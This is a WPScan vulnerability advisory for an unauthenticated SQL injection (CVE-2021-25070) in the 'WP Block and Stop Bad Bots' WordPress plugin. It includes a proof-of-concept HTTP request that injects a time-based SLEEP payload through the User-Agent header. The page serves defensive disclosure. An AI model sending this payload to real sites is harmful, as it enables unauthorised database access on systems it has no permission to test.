WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Block and Stop Bad Bots < 6.88 - Unauthenticated SQLi

Description

The plugin does not properly sanitise and escape the User Agent before using it in a SQL statement to record logs, leading to an SQL Injection issue

Proof of Concept

GET / HTTP/1.1
User-Agent: \'+SLEEP(5))-- g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Affects Plugins

stopbadbots
Fixed in version 6.930

References

CVE
CVE-2021-25070

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
e00b2946-15e5-4458-9b13-2e272630a36f

Timeline

Publicly Published

2022-03-08 (about 6 months ago)

Added

2022-03-07 (about 6 months ago)

Last Updated

2022-04-09 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin